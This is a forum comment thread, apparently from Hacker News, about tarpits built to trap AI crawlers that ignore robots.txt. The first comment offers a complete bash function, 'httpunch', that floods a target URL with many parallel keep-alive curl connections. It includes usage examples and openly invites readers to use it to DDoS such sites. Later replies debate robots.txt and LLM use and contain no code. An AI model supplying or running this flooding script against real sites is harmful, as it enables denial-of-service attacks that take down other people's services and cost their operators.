
Comment by pmarreck

1 day ago

It's not. It's rather pointless and, frankly, nearsighted. And we can DDoS sites like this just as offensively, simply by making many requests: its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even one person to make many requests. It's only expensive to host. So feel free to use this bash function to defeat these:

    httpunch() {
      local url=$1   # first argument: either "kill" or the target URL
      local connections=${HTTPUNCH_CONNECTIONS:-100}
      local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
      local silent_mode=false

      # Check if "kill" was passed as the first argument
      if [[ $url == "kill" ]]; then
        echo "Killing all curl processes..."
        pkill -f "curl --no-buffer"
        return
      fi

      # Parse optional arguments: a bare number sets the connection count,
      # --silent suppresses curl output
      local arg
      for arg in "${@:2}"; do
        if [[ $arg == "--silent" ]]; then
          silent_mode=true
        elif [[ $arg =~ ^[0-9]+$ ]]; then
          connections=$arg
        fi
      done

      # Ensure URL is provided if "kill" is not used
      if [[ -z $url ]]; then
        echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
        echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
        return 1
      fi

      echo "Starting $connections connections to $url..."
      local i
      for ((i = 1; i <= connections; i++)); do
        if $silent_mode; then
          curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
        else
          curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
        fi
      done

      echo "$connections connections started with a keepalive time of $keepalive_time seconds."
      echo "Use 'httpunch kill' to terminate them."
    }
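
For reference, usage looks like this (example.com is just a placeholder target):

    # open 200 connections with curl's output suppressed
    httpunch https://example.com 200 --silent

    # tear them all down again
    httpunch kill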

(Generated in a few seconds with the help of an LLM, of course.) Your free speech is also my free speech. LLMs are just a very useful tool, and Llama, for example, is open source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk anticorporate AI-doomers who decide to create chaos instead of using that same energy to try to steer progress </opinion>.

The tarpit is made for LLM crawlers that don't respect robots.txt. Do you love LLMs so much that you wish they didn't have to respect this stupid, anticorporate AI-doomer robots.txt convention, so they could pry one more URL out of the webserver's greedy hands?
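
For the record, the convention in question is just a plain-text file at the site root. A minimal sketch (the user-agent name here is only an example):

    # robots.txt — ask one crawler to stay out entirely, allow everyone else
    User-agent: GPTBot
    Disallow: /

    User-agent: *
    Disallow:

A well-behaved crawler fetches this file first and never touches the tarpit; only a crawler that ignores it (or never requests it) wanders in.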

Maybe you just had a knee-jerk reaction.

You called the parent unintelligent, yet you needed an LLM to show you how to run curl in a loop. Yikes.

  • Your assumption that I couldn't have written this myself or that I didn't make corrections to it is telling. I've only been doing dev for 30+ years lol

    LLMs are an accelerant, like all previous tools... not a replacement, although it seems most people still need to figure that out for themselves, while I already have.

    • Sure, but in this case it's like driving your car 10 feet to your mailbox and then bragging about what an accelerant it is (in other words, the task wasn't remotely difficult to begin with and doesn't really warrant "accelerating"). I assume your note about it being written with an LLM was more to spite the anti-LLM sentiment above, though, which would make more sense.
